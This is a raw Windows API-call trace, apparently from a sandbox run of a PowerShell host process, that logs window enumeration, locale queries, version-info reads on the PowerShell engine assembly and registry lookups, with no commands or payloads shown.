	[0920.822] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.822] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x460
	[0920.822] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x460
	[0920.823] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x44c
	[0920.823] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x778
	[0920.823] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x460
	[0920.823] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x558
	[0920.823] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.823] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.823] GetWindowThreadProcessId (in: hWnd=0x10bd8, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x25d8
	[0920.823] GetWindowThreadProcessId (in: hWnd=0x10bb8, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x2594
	[0920.824] GetWindowThreadProcessId (in: hWnd=0x10baa, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x2590
	[0920.824] GetWindowThreadProcessId (in: hWnd=0x10b76, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x2530
	[0920.824] GetWindowThreadProcessId (in: hWnd=0x10b68, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x251c
	[0920.824] GetWindowThreadProcessId (in: hWnd=0x10b64, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x2254
	[0920.824] GetWindowThreadProcessId (in: hWnd=0x10b60, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x2250
	[0920.824] GetWindowThreadProcessId (in: hWnd=0x10b54, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x16f0
	[0920.824] GetWindowThreadProcessId (in: hWnd=0x10b48, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1338
	[0920.824] GetWindowThreadProcessId (in: hWnd=0x10b3e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1ca0
	[0920.824] GetWindowThreadProcessId (in: hWnd=0x10b34, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x238c
	[0920.825] GetWindowThreadProcessId (in: hWnd=0x10b2a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1b08
	[0920.825] GetWindowThreadProcessId (in: hWnd=0x10b0e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1a8c
	[0920.825] GetWindowThreadProcessId (in: hWnd=0x10af8, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x18e0
	[0920.825] GetWindowThreadProcessId (in: hWnd=0x10aec, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x2344
	[0920.825] GetWindowThreadProcessId (in: hWnd=0x10ae0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1d8c
	[0920.825] GetWindowThreadProcessId (in: hWnd=0x10ad4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1038
	[0920.825] GetWindowThreadProcessId (in: hWnd=0x10ad0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1a58
	[0920.825] GetWindowThreadProcessId (in: hWnd=0x10acc, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1c7c
	[0920.826] GetWindowThreadProcessId (in: hWnd=0x10ac6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1f04
	[0920.826] GetWindowThreadProcessId (in: hWnd=0x10ac2, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x18b8
	[0920.826] GetWindowThreadProcessId (in: hWnd=0x40278, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x22c8
	[0920.826] GetWindowThreadProcessId (in: hWnd=0x10abe, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x21b8
	[0920.826] GetWindowThreadProcessId (in: hWnd=0x20958, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x21c0
	[0920.826] GetWindowThreadProcessId (in: hWnd=0x10a7a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x219c
	[0920.826] GetWindowThreadProcessId (in: hWnd=0x10a6a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x20f4
	[0920.826] GetWindowThreadProcessId (in: hWnd=0x10a4c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x20e4
	[0920.827] GetWindowThreadProcessId (in: hWnd=0x10a40, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x20e8
	[0920.827] GetWindowThreadProcessId (in: hWnd=0x10a36, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x20ec
	[0920.827] GetWindowThreadProcessId (in: hWnd=0x20602, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x20f0
	[0920.827] GetWindowThreadProcessId (in: hWnd=0x10a2e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1e34
	[0920.827] GetWindowThreadProcessId (in: hWnd=0x10a28, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xc38
	[0920.827] GetWindowThreadProcessId (in: hWnd=0x10a20, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1fe4
	[0920.827] GetWindowThreadProcessId (in: hWnd=0x10a10, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1f10
	[0920.827] GetWindowThreadProcessId (in: hWnd=0x10a0c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1f0c
	[0920.827] GetWindowThreadProcessId (in: hWnd=0x10a08, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1f08
	[0920.828] GetWindowThreadProcessId (in: hWnd=0x109fc, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1ef0
	[0920.828] GetWindowThreadProcessId (in: hWnd=0x109ee, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1eec
	[0920.828] GetWindowThreadProcessId (in: hWnd=0x109e0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1ee4
	[0920.828] GetWindowThreadProcessId (in: hWnd=0x109c6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1ed8
	[0920.828] GetWindowThreadProcessId (in: hWnd=0x109b6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1ed0
	[0920.828] GetWindowThreadProcessId (in: hWnd=0x1099c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1e8c
	[0920.828] GetWindowThreadProcessId (in: hWnd=0x1098e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1e88
	[0920.828] GetWindowThreadProcessId (in: hWnd=0x1097e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1e84
	[0920.828] GetWindowThreadProcessId (in: hWnd=0x20620, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1604
	[0920.829] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1c2c
	[0920.829] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1c08
	[0920.829] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1c0c
	[0920.829] GetWindowThreadProcessId (in: hWnd=0x10962, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1c10
	[0920.829] GetWindowThreadProcessId (in: hWnd=0x1095e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1c14
	[0920.829] GetWindowThreadProcessId (in: hWnd=0x2043c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1c18
	[0920.829] GetWindowThreadProcessId (in: hWnd=0x206a6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1c1c
	[0920.829] GetWindowThreadProcessId (in: hWnd=0x4092e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x16fc
	[0920.830] GetWindowThreadProcessId (in: hWnd=0x30426, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1e78
	[0920.830] GetWindowThreadProcessId (in: hWnd=0x10956, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1c20
	[0920.830] GetWindowThreadProcessId (in: hWnd=0x503ea, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x191c
	[0920.830] GetWindowThreadProcessId (in: hWnd=0x108c6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1748
	[0920.830] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1bb4
	[0920.830] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x10bc
	[0920.830] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1b50
	[0920.830] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x14b4
	[0920.831] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x149c
	[0920.831] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x14a8
	[0920.831] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1490
	[0920.831] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x14a4
	[0920.831] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x148c
	[0920.831] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1458
	[0920.831] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1b4c
	[0920.831] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1b3c
	[0920.831] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x19bc
	[0920.832] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x199c
	[0920.832] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1998
	[0920.832] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1994
	[0920.832] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1990
	[0920.832] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1984
	[0920.832] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x197c
	[0920.832] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1978
	[0920.836] WerSetFlags () returned 0x0
	[0921.740] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0921.741] CoTaskMemFree (pv=0x0) 
	[0921.742] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24df08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24df00 | out: pulNumLanguages=0x24df08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24df00) returned 1
	[0921.742] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24df08, pwszLanguagesBuffer=0x2e1f748, pcchLanguagesBuffer=0x24df00 | out: pulNumLanguages=0x24df08, pwszLanguagesBuffer=0x2e1f748, pcchLanguagesBuffer=0x24df00) returned 1
	[0921.749] CoTaskMemAlloc (cb=0x24) returned 0x2063c40
	[0921.749] GetUserDefaultLocaleName (in: lpLocaleName=0x2063c40, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0921.749] CoTaskMemFree (pv=0x2063c40) 
	[0922.441] CoTaskMemAlloc (cb=0x104) returned 0x4c56f0
	[0922.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c56f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0922.441] CoTaskMemFree (pv=0x4c56f0) 
	[0922.443] CoTaskMemAlloc (cb=0x104) returned 0x4c56f0
	[0922.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c56f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0922.443] CoTaskMemFree (pv=0x4c56f0) 
	[0922.445] CoTaskMemAlloc (cb=0x104) returned 0x4c56f0
	[0922.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c56f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0922.445] CoTaskMemFree (pv=0x4c56f0) 
	[0922.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0922.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0922.460] SetErrorMode (uMode=0x1) returned 0x1
	[0922.460] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24db80 | out: lpFileInformation=0x24db80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0925.448] SetErrorMode (uMode=0x1) returned 0x1
	[0925.448] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24ddf0 | out: lpdwHandle=0x24ddf0) returned 0x94c
	[0925.449] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e22fd8 | out: lpData=0x2e22fd8) returned 1
	[0925.450] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dd68, puLen=0x24dd60 | out: lplpBuffer=0x24dd68*=0x2e23074, puLen=0x24dd60) returned 1
	[0925.450] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24dcd8, puLen=0x24dcd0 | out: lplpBuffer=0x24dcd8*=0x2e23150, puLen=0x24dcd0) returned 1
	[0925.450] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0925.450] CoTaskMemAlloc (cb=0x2e) returned 0x53f420
	[0925.450] lstrcpyW (in: lpString1=0x53f420, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0925.450] CoTaskMemFree (pv=0x53f420) 
	[0925.450] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24dcd8, puLen=0x24dcd0 | out: lplpBuffer=0x24dcd8*=0x2e231a4, puLen=0x24dcd0) returned 1
	[0925.450] lstrlenW (lpString="System.Management.Automation") returned 28
	[0925.450] CoTaskMemAlloc (cb=0x3c) returned 0x499110
	[0925.450] lstrcpyW (in: lpString1=0x499110, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0925.450] CoTaskMemFree (pv=0x499110) 
	[0925.450] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24dcd8, puLen=0x24dcd0 | out: lplpBuffer=0x24dcd8*=0x2e23200, puLen=0x24dcd0) returned 1
	[0925.451] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0925.451] CoTaskMemAlloc (cb=0x20) returned 0x2063ca0
	[0925.451] lstrcpyW (in: lpString1=0x2063ca0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0925.451] CoTaskMemFree (pv=0x2063ca0) 
	[0925.451] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24dcd8, puLen=0x24dcd0 | out: lplpBuffer=0x24dcd8*=0x2e23240, puLen=0x24dcd0) returned 1
	[0925.451] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0925.451] CoTaskMemAlloc (cb=0x44) returned 0x499110
	[0925.451] lstrcpyW (in: lpString1=0x499110, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0925.451] CoTaskMemFree (pv=0x499110) 
	[0925.451] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24dcd8, puLen=0x24dcd0 | out: lplpBuffer=0x24dcd8*=0x2e232a8, puLen=0x24dcd0) returned 1
	[0925.451] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0925.451] CoTaskMemAlloc (cb=0x76) returned 0x4c2eb0
	[0925.451] lstrcpyW (in: lpString1=0x4c2eb0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0925.451] CoTaskMemFree (pv=0x4c2eb0) 
	[0925.451] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24dcd8, puLen=0x24dcd0 | out: lplpBuffer=0x24dcd8*=0x2e23344, puLen=0x24dcd0) returned 1
	[0925.451] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0925.451] CoTaskMemAlloc (cb=0x44) returned 0x499110
	[0925.452] lstrcpyW (in: lpString1=0x499110, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0925.452] CoTaskMemFree (pv=0x499110) 
	[0925.452] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24dcd8, puLen=0x24dcd0 | out: lplpBuffer=0x24dcd8*=0x2e233a8, puLen=0x24dcd0) returned 1
	[0925.452] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0925.452] CoTaskMemAlloc (cb=0x58) returned 0x4e3a60
	[0925.452] lstrcpyW (in: lpString1=0x4e3a60, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0925.452] CoTaskMemFree (pv=0x4e3a60) 
	[0925.452] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24dcd8, puLen=0x24dcd0 | out: lplpBuffer=0x24dcd8*=0x2e23424, puLen=0x24dcd0) returned 1
	[0925.452] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0925.452] CoTaskMemAlloc (cb=0x20) returned 0x2063ca0
	[0925.452] lstrcpyW (in: lpString1=0x2063ca0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0925.452] CoTaskMemFree (pv=0x2063ca0) 
	[0925.452] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24dcd8, puLen=0x24dcd0 | out: lplpBuffer=0x24dcd8*=0x2e230cc, puLen=0x24dcd0) returned 1
	[0925.452] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0925.452] CoTaskMemAlloc (cb=0x66) returned 0x538380
	[0925.452] lstrcpyW (in: lpString1=0x538380, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0925.452] CoTaskMemFree (pv=0x538380) 
	[0925.452] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24dcd8, puLen=0x24dcd0 | out: lplpBuffer=0x24dcd8*=0x0, puLen=0x24dcd0) returned 0
	[0925.452] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24dcd8, puLen=0x24dcd0 | out: lplpBuffer=0x24dcd8*=0x0, puLen=0x24dcd0) returned 0
	[0925.453] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24dcd8, puLen=0x24dcd0 | out: lplpBuffer=0x24dcd8*=0x0, puLen=0x24dcd0) returned 0
	[0925.453] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dca8, puLen=0x24dca0 | out: lplpBuffer=0x24dca8*=0x2e23074, puLen=0x24dca0) returned 1
	[0925.453] CoTaskMemAlloc (cb=0x204) returned 0x4c6cd0
	[0925.453] VerLanguageNameW (in: wLang=0x0, szLang=0x4c6cd0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0925.453] CoTaskMemFree (pv=0x4c6cd0) 
	[0925.453] VerQueryValueW (in: pBlock=0x2e22fd8, lpSubBlock="\\", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2e23000, puLen=0x24dcf0) returned 1
	[0925.462] CoTaskMemAlloc (cb=0x104) returned 0x4c56f0
	[0925.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c56f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0925.462] CoTaskMemFree (pv=0x4c56f0) 
	[0925.467] CoTaskMemAlloc (cb=0x104) returned 0x4c56f0
	[0925.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c56f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0925.467] CoTaskMemFree (pv=0x4c56f0) 
	[0925.472] lstrlenW (lpString="䅁") returned 1
	[0925.482] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dbc8 | out: phkResult=0x24dbc8*=0x2ec) returned 0x0
	[0925.483] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dbb8 | out: phkResult=0x24dbb8*=0x2f0) returned 0x0
	[0925.483] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dc48 | out: phkResult=0x24dc48*=0x2f4) returned 0x0
	[0925.486] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24db8c, lpData=0x0, lpcbData=0x24db88*=0x0 | out: lpType=0x24db8c*=0x1, lpData=0x0, lpcbData=0x24db88*=0x56) returned 0x0
	[0925.487] CoTaskMemAlloc (cb=0x5a) returned 0x538310
	[0925.487] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24db5c, lpData=0x538310, lpcbData=0x24db58*=0x56 | out: lpType=0x24db5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24db58*=0x56) returned 0x0
	[0925.487] CoTaskMemFree (pv=0x538310) 
	[0926.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0926.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0926.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0926.704] CoTaskMemAlloc (cb=0x104) returned 0x4c56f0
	[0926.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c56f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0926.704] CoTaskMemFree (pv=0x4c56f0) 
	[0933.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
